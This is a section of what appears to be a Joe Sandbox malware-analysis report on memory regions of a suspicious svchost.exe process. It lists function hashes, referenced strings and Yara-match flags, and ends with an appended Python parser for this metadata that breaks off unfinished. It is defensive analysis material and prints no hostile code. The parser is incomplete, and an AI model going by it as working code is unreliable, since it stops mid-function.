                                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                              • Instruction Fuzzy Hash: F6C1CE312047429FD724CF68C944BABFBE5AF84358F088A2EF699CA290D779D505CF51
                                                                              Strings
                                                                              • ResIdCount less than 2., xrefs: 03A8EEC9
                                                                              • Failed to retrieve service checksum., xrefs: 03A8EE56
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                              • API String ID: 0-863616075
                                                                              • Opcode ID: 4f997e090ffd5d28ca1235c0970a6b977c46f335d724c16239e74e0096c82c8a
                                                                              • Instruction ID: eae62c7f7d0e92526fcc9591efc1be43e2ac25469e405032f68f141408973b1c
                                                                              • Opcode Fuzzy Hash: 4f997e090ffd5d28ca1235c0970a6b977c46f335d724c16239e74e0096c82c8a
                                                                              • Instruction Fuzzy Hash: 49E1E1B19087849FE324CF15C441BABBBE4BB88314F008A2FE59D8B381DB749509CF56
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: Legacy$UEFI
                                                                              • API String ID: 2994545307-634100481
                                                                              • Opcode ID: 1a506d39b7540ce06c88a39ab856b30e8fb7da990d5bcbe32583788bd8558ac1
                                                                              • Instruction ID: fe63cef0f58181a8f0ad6ca9a193e05bfccce0e5103537f7dbb1726626a0688d
                                                                              • Opcode Fuzzy Hash: 1a506d39b7540ce06c88a39ab856b30e8fb7da990d5bcbe32583788bd8558ac1
                                                                              • Instruction Fuzzy Hash: 83611972E007189FDB25DFA9C980FAEBBB9FB48700F14446EE559EB291D731A940CB50
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $$$
                                                                              • API String ID: 0-233714265
                                                                              • Opcode ID: a1fe3c16f599b8381f6ccc23971672a75f23e53490f6ca8700c33fcf0be63e86
                                                                              • Instruction ID: 14f5573c7da737d43996675d3e16fe1be76eff62064721f2db823f9f97dab2d7
                                                                              • Opcode Fuzzy Hash: a1fe3c16f599b8381f6ccc23971672a75f23e53490f6ca8700c33fcf0be63e86
                                                                              • Instruction Fuzzy Hash: E0619875A00749DFDB20EFA4C684BA9B7B1BB88308F18516FE515AF780CB74A941CB90
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: gfff$q
                                                                              • API String ID: 0-918332397
                                                                              • Opcode ID: 97ce171283b42d82976ca56dbdc4c90236aadc8937fca03456c270960f7a6552
                                                                              • Instruction ID: 7afb867e393403ff6ad9d40ee17d8697fa37fa98e2aadaa4b9add5deb6cc4a5f
                                                                              • Opcode Fuzzy Hash: 97ce171283b42d82976ca56dbdc4c90236aadc8937fca03456c270960f7a6552
                                                                              • Instruction Fuzzy Hash: 50410632B0000507DF1C895DDDA07AA7696EBE8355F18C17FEA4AEF3E1E938ED024684
                                                                              Strings
                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 03A3A2FB
                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 03A3A309
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                              • API String ID: 0-2876891731
                                                                              • Opcode ID: 02ee62e46804497b8d13d3a3048ea6584d4c8ceea016cb47bb799c774bdc231a
                                                                              • Instruction ID: 1e984b6ce8cfbe99f09a20eeb728b9390f0b5f5433304e694890da2cf546d44e
                                                                              • Opcode Fuzzy Hash: 02ee62e46804497b8d13d3a3048ea6584d4c8ceea016cb47bb799c774bdc231a
                                                                              • Instruction Fuzzy Hash: 02418E39A04659DBDB11CF69C840B69B7F4EF86700F1844ABEC44EB391E335D940CB51
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .Local\$@
                                                                              • API String ID: 0-380025441
                                                                              • Opcode ID: 9a22b1a30ad11d13977a82771cefdcac3516183899cfe55b4bfce71a5dea755a
                                                                              • Instruction ID: 217f52c9be5798c8a8e774fec2ba42c26763eceef0c792221df439a303396b1d
                                                                              • Opcode Fuzzy Hash: 9a22b1a30ad11d13977a82771cefdcac3516183899cfe55b4bfce71a5dea755a
                                                                              • Instruction Fuzzy Hash: 8031A17A5093049FCB10DF28C984A5BBBF8EBC5654F48092FF595872A0DA30DD05CB92
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: MUI
                                                                              • API String ID: 0-1339004836
                                                                              • Opcode ID: 44d76195c4876e8ff4a0f178b4e1b78bf05fcfa76dc9d232f9324d2f07a5f57c
                                                                              • Instruction ID: 677922b58dce1b654552457bfd1fe1c2554a5188b2ce59053ef5459f6cdb6860
                                                                              • Opcode Fuzzy Hash: 44d76195c4876e8ff4a0f178b4e1b78bf05fcfa76dc9d232f9324d2f07a5f57c
                                                                              • Instruction Fuzzy Hash: E8822775E00218DFDB24CFA9C984BADF7B5BF4A710F18816AE859AB394D7309D81CB50
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: P`2wRb2w
                                                                              • API String ID: 0-2964624058
                                                                              • Opcode ID: 7342cf4e4d69a3c314e8478ead086bb63926f2ddf7b25e900121087bda6b88eb
                                                                              • Instruction ID: 614cf0fe81c0d5ac59cda9ef0b1b4f7ab7f7f86c7e6bb9ac2e62ff2701397f9d
                                                                              • Opcode Fuzzy Hash: 7342cf4e4d69a3c314e8478ead086bb63926f2ddf7b25e900121087bda6b88eb
                                                                              • Instruction Fuzzy Hash: 6142BE7DD04259AEDF29EFA8D8446BDFBB5AF05B10F18806FE441AB2D0D7748A81CB50
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: IDwIDw@4Dw@4Dw
                                                                              • API String ID: 0-2067196109
                                                                              • Opcode ID: 4a63ee264ef4f64deadc8d159b05abd103338748a5a7b860e26c317acb37ee74
                                                                              • Instruction ID: 7d9423239c206e83e48264a510a76ab65fad31c980a57d05a1c3bd774e68a426
                                                                              • Opcode Fuzzy Hash: 4a63ee264ef4f64deadc8d159b05abd103338748a5a7b860e26c317acb37ee74
                                                                              • Instruction Fuzzy Hash: 5522C376900609DFDB10DFA8C984BAEB7B5FF88314F1486ABE8149B345E734DA45CB90
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4039f69f10575893d65e3dc404952f422e97782aae68f6ee03906d4fdabe63df
                                                                              • Instruction ID: eb0fd9238ef9833a818ff9a74a081080f367bfb7fa71a8f3f298ece9abdc4357
                                                                              • Opcode Fuzzy Hash: 4039f69f10575893d65e3dc404952f422e97782aae68f6ee03906d4fdabe63df
                                                                              • Instruction Fuzzy Hash: F5A169B5608342CFD724DF28D580A2ABBF9BF89304F1449AEF5859B350E731E945CB92
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0
                                                                              • API String ID: 0-4108050209
                                                                              • Opcode ID: ea6a1f2d78cb6b16bfaac3eaf6362bd3fa6de8b55da691206a3c8f4ffb99020b
                                                                              • Instruction ID: fe18fdf758ddbb705bb336e58ff3e2fe2c24488414bd99d2642f4bbddba1e867
                                                                              • Opcode Fuzzy Hash: ea6a1f2d78cb6b16bfaac3eaf6362bd3fa6de8b55da691206a3c8f4ffb99020b
                                                                              • Instruction Fuzzy Hash: 2DF18E796087458FDF25CF25C580B6ABBE5AFC8650F09486FFC8A9B380DB30D9498B51
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (
                                                                              • API String ID: 0-3887548279
                                                                              • Opcode ID: 1512dec80ea374e127638e4f83072ab23baf97c752ec7e07034fea09231f302b
                                                                              • Instruction ID: bf94228a2810af86a10956fae35c952125646ab9a0c384d67a8b2cc036f1d0ea
                                                                              • Opcode Fuzzy Hash: 1512dec80ea374e127638e4f83072ab23baf97c752ec7e07034fea09231f302b
                                                                              • Instruction Fuzzy Hash: B3021F76E006189FDB54CF9AC4805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (
                                                                              • API String ID: 0-3887548279
                                                                              • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                              • Instruction ID: a1e9036dfd06e2825e18ecc76780960be50e1d742efce9da3c4335088054a0ac
                                                                              • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                              • Instruction Fuzzy Hash: CB021FB6E006189FDB54CF9AC4805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: IDwIDw@4Dw@4Dw
                                                                              • API String ID: 0-2067196109
                                                                              • Opcode ID: a51140e4b3c33dccd1baca5e0a7e9211dd1cbc8a339bc323443e3f4bac182357
                                                                              • Instruction ID: 6a4a050eae1b7e7f7f1533120f3ed1f1b40df9eb20d4c6b5a0700e11c6d87b1e
                                                                              • Opcode Fuzzy Hash: a51140e4b3c33dccd1baca5e0a7e9211dd1cbc8a339bc323443e3f4bac182357
                                                                              • Instruction Fuzzy Hash: 52F1C175900609DFDB14DFA8C980BAEB7B5FF48304F1886AAE815EB345E734DA45CB90
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c11fbf2f04bcbd650e43de2c28a217049f454bce5c912b115dc58a59ef5184f2
                                                                              • Instruction ID: 1112202be1040bd41c8c32b9f50e9226aa79b4f364d7c1dbbbf504b3a5290133
                                                                              • Opcode Fuzzy Hash: c11fbf2f04bcbd650e43de2c28a217049f454bce5c912b115dc58a59ef5184f2
                                                                              • Instruction Fuzzy Hash: FC414978900288AFDB21DFA9D980AAEFBF4FB48304F14416FE859AB211D7359940CB60
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID: 0-3916222277
                                                                              • Opcode ID: 63ca541a1368ad5a10f12aad4cc11ffa9751dcd655141c78a12ee341f202856f
                                                                              • Instruction ID: 25bf37e931ab92400de16b3e3626f1a6e61acdee3cccd67151376574a9a3b495
                                                                              • Opcode Fuzzy Hash: 63ca541a1368ad5a10f12aad4cc11ffa9751dcd655141c78a12ee341f202856f
                                                                              • Instruction Fuzzy Hash: F1A10931A08368ABDF28DB698945FFEA7B95F56304F0840DFFD87AB281D6748940CB51
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: I
                                                                              • API String ID: 0-3707901625
                                                                              • Opcode ID: 374332b86d9cc2b53e02d0e6a95bb3c640f25e6c98a907c31a1ae20a5c442ab7
                                                                              • Instruction ID: aa154272957bab8e5290256277be23bda8b3dda8d4f1f6dd7fdccd919569c6b8
                                                                              • Opcode Fuzzy Hash: 374332b86d9cc2b53e02d0e6a95bb3c640f25e6c98a907c31a1ae20a5c442ab7
                                                                              • Instruction Fuzzy Hash: E3710775E0010A8BDF0CDE59CA983AEB762EB94314F28823ED915AF3C1D6BD9D418784
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @
                                                                              • API String ID: 0-2766056989
                                                                              • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                              • Instruction ID: b2f80c38dc2a053429c2eaf52d74e07b08113aa363a6d3dd09591dff4710f7eb
                                                                              • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                              • Instruction Fuzzy Hash: 35613C75D00219ABDF21DF99C944BAEFBB8EF85714F14456FE810B7290D7B49901CBA0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 04Dw04DwIDwIDw@4Dw@4Dw
                                                                              • API String ID: 0-2081880359
                                                                              • Opcode ID: 9c12643a38392e10fdb0d3792171c7647967daaf6fde20319a2825e8786a52da
                                                                              • Instruction ID: b7cffca9b55cadc5ce182b24b595e6e4db7158a9e29d6fd6bafd6231a4bad012
                                                                              • Opcode Fuzzy Hash: 9c12643a38392e10fdb0d3792171c7647967daaf6fde20319a2825e8786a52da
                                                                              • Instruction Fuzzy Hash: DD412535600710AFCB25EF29DA80F2ABBA9EF44764F15456FE5599B790D770DC008BA0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @
                                                                              • API String ID: 0-2766056989
                                                                              • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                              • Instruction ID: 0bc704624d42cc68630cbf413135b15625f66575521c2b6838c1d7963715d6c7
                                                                              • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                              • Instruction Fuzzy Hash: B2516772604345AFD721DF54CD84FAAB7BCFB84750F08092EB9809B291D7B4E914CB92
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: EXT-
                                                                              • API String ID: 0-1948896318
                                                                              • Opcode ID: dd1e64b0bdbc65991748bf84c1470d96717c51955ce0b4e3d6828c137c6d9511
                                                                              • Instruction ID: 469494d91b8942fadfeca3192ff490e22da4dfd56dcddbf3d0df3d4728d76353
                                                                              • Opcode Fuzzy Hash: dd1e64b0bdbc65991748bf84c1470d96717c51955ce0b4e3d6828c137c6d9511
                                                                              • Instruction Fuzzy Hash: 3D416D76608341ABD710DB65CA80F6BB7E8BFC9724F44092FB984EB280E674D9048796
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: PreferredUILanguages
                                                                              • API String ID: 0-1884656846
                                                                              • Opcode ID: 2556ef0672e753ccffc4b7cf8c44fc8c993c910e7ab7d911800da4347d9c5d89
                                                                              • Instruction ID: 0bf2ffc12b98ea59b1c9a5dbb3f6a22a7917a72c214b63e55c37e390f6d1f0f8
                                                                              • Opcode Fuzzy Hash: 2556ef0672e753ccffc4b7cf8c44fc8c993c910e7ab7d911800da4347d9c5d89
                                                                              • Instruction Fuzzy Hash: 3141D23AD0421AAFCB11EB98C985BEEF7B9AF44710F05016BE911EB654D6B4DE40C7B0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: BinaryHash
                                                                              • API String ID: 0-2202222882
                                                                              • Opcode ID: abe4058df69b856430270bada14a2d75a6d8ac7dff8aa5fa94c197893163fb33
                                                                              • Instruction ID: 9531dd9262fbd81c8677462acfe21dd1a65f00fb9eb8e8af66692a30cc91a83c
                                                                              • Opcode Fuzzy Hash: abe4058df69b856430270bada14a2d75a6d8ac7dff8aa5fa94c197893163fb33
                                                                              • Instruction Fuzzy Hash: 544137B6D0062CABEB21DB54CD84FDEB77CAB45714F0045E6E608EB240DB709E498FA4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: verifier.dll
                                                                              • API String ID: 0-3265496382
                                                                              • Opcode ID: 24034735ebe17cb15f3a5bdfffd5d6163d59c277c7efbb4d89e2fbaad08f38a7
                                                                              • Instruction ID: 093dab7a00b60d91d4aad08fa41093c583ed1f2176691f80fd282057efe6ef59
                                                                              • Opcode Fuzzy Hash: 24034735ebe17cb15f3a5bdfffd5d6163d59c277c7efbb4d89e2fbaad08f38a7
                                                                              • Instruction Fuzzy Hash: 22318275A003019FDB34DFA99950AB7B6F9EB59314F58807FE6089F382E7318C818790
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Flst
                                                                              • API String ID: 0-2374792617
                                                                              • Opcode ID: 3f56cbfd95e3ee63dd52777c446f134a5ec60beed2a824023dd63a219ba3397a
                                                                              • Instruction ID: ad910cae8ffb72d45c5c2f007937f99f5e71966715f942a1f1eaffa9f46bdbb5
                                                                              • Opcode Fuzzy Hash: 3f56cbfd95e3ee63dd52777c446f134a5ec60beed2a824023dd63a219ba3397a
                                                                              • Instruction Fuzzy Hash: 334189B5605301DFCB14CF18C580A26FBE4EF8A710F1885AFE45A8F291DB71D942CB91
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: L4DwL4Dw
                                                                              • API String ID: 0-819149176
                                                                              • Opcode ID: 0ccdc5aa702bdf0825e4e9bad97c5211f6034481d7c483179a266647fb8e7703
                                                                              • Instruction ID: af420130cf843bbcfcf03bbe6508a1615216b530627310d86487e7881dd52406
                                                                              • Opcode Fuzzy Hash: 0ccdc5aa702bdf0825e4e9bad97c5211f6034481d7c483179a266647fb8e7703
                                                                              • Instruction Fuzzy Hash: E421C17AA00B20AFC321EF58C500B1BBFB5FB85B54F15046EE9699B740D770E811CBA0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Actx
                                                                              • API String ID: 0-89312691
                                                                              • Opcode ID: 1786f7db44108600ac67c2adcc705d04fcb853ac516809d007e3d7daf1071b9c
                                                                              • Instruction ID: f256d26678ab7bb053f7cf2611d7cd4d7713507027e2cb9e96716aed25fb04c4
                                                                              • Opcode Fuzzy Hash: 1786f7db44108600ac67c2adcc705d04fcb853ac516809d007e3d7daf1071b9c
                                                                              • Instruction Fuzzy Hash: 23115130F49A028FEB24DA1DD8506B6F2E9EB97364F38852FF452DB391D672D8418780
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrCreateEnclave
                                                                              • API String ID: 0-3262589265
                                                                              • Opcode ID: 5c7691c7d443701785bcbcdb92eeaf85b4f0f9beef43b37d6667c73fda5093a2
                                                                              • Instruction ID: f7339886c24f0f9b86a058541bd63a05b53c3ec940793a936c8ea9a8cf0ec408
                                                                              • Opcode Fuzzy Hash: 5c7691c7d443701785bcbcdb92eeaf85b4f0f9beef43b37d6667c73fda5093a2
                                                                              • Instruction Fuzzy Hash: 8B21F3B1508344AFC320DF1A9944A9BFBE8FBD5B00F104A1FB5A49B251EBB09504CB92
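As an added example (not part of the Joe Sandbox report and not Joe Sandbox code), a small Python parser for the function-metadata blocks in this section: it reads the "Memory Dump Source" / "• Key: Value" layout, decodes the .sdmp source-file name and groups the functions by the memory region they were recovered from. The layout of the dotted .sdmp name is an assumption; only the base-address field (cross-checked against the report's own "Offset:") and the protection field (0x40 is the documented Win32 PAGE_EXECUTE_READWRITE) are interpreted, the rest are kept raw. The sample input is a constructed, abridged copy of three entries from this section.

```python
import re
from dataclasses import dataclass, field

# Win32 page-protection constants (winnt.h); 0x40 is the value seen in both dump names above.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}

# ASSUMPTION about the .sdmp name layout:
#   <process index>.<dump index>.<dump id>.<base address>.<protection>.<three raw fields>
# Only the base address (cross-checked against the report's "Offset:") and the
# protection value are interpreted; the remaining fields stay raw hex strings.
SOURCE_RE = re.compile(
    r"(\d{8})\.(\d{8})\.(\d+)\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})((?:\.[0-9A-Fa-f]{8}){3})"
    r"\.sdmp, Offset: ([0-9A-Fa-f]+), based on PE: (true|false)")

# Constructed sample: three function blocks from this section, abridged to the lines used here.
SAMPLE = """\
Memory Dump Source
• Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Snapshot File: hcaresult_2_2_400000_svchost.jbxd
Yara matches
• String ID: I
• API String ID: 0-3707901625
• Instruction Fuzzy Hash: E3710775E0010A8BDF0CDE59CA983AEB762EB94314F28823ED915AF3C1D6BD9D418784
Strings
Memory Dump Source
• Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
• Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
• String ID: LdrCreateEnclave
• API String ID: 0-3262589265
• Instruction Fuzzy Hash: 8B21F3B1508344AFC320DF1A9944A9BFBE8FBD5B00F104A1FB5A49B251EBB09504CB92
Memory Dump Source
• Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
• Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
• String ID: verifier.dll
• API String ID: 0-3265496382
• Instruction Fuzzy Hash: 22318275A003019FDB34DFA99950AB7B6F9EB59314F58807FE6089F382E7318C818790
"""


@dataclass
class DumpSource:
    process_index: int
    base: int
    protect: int
    raw_fields: list
    based_on_pe: bool


@dataclass
class RegionSummary:
    source: DumpSource
    functions: int = 0
    yara_match: bool = False
    strings: set = field(default_factory=set)


def parse_source_file(value):
    """Decode one 'Source File:' value; refuse it if the name and the Offset disagree."""
    m = SOURCE_RE.fullmatch(value.strip())
    if not m:
        raise ValueError("unrecognised Source File: %r" % value)
    base = int(m.group(4), 16)
    if base != int(m.group(7), 16):
        raise ValueError("base %#x disagrees with Offset %s" % (base, m.group(7)))
    return DumpSource(int(m.group(1)), base, int(m.group(5), 16),
                      m.group(6).strip(".").split("."), m.group(8) == "true")


def parse_blocks(text):
    """One dict per 'Memory Dump Source' block: its '• Key: Value' lines plus a Yara flag."""
    blocks = []
    for chunk in re.split(r"^Memory Dump Source$", text, flags=re.M)[1:]:
        kv, yara = {}, False
        for line in (ln.strip() for ln in chunk.splitlines()):
            if line == "Yara matches":
                yara = True
            elif line.startswith("• ") and ":" in line:
                key, _, val = line[2:].partition(":")   # value may itself contain colons
                kv[key.strip()] = val.strip()
        blocks.append({"source": parse_source_file(kv["Source File"]), "yara": yara, "fields": kv})
    return blocks


def summarize(blocks):
    """Group blocks by base address; collect the String IDs referenced from each region."""
    regions = {}
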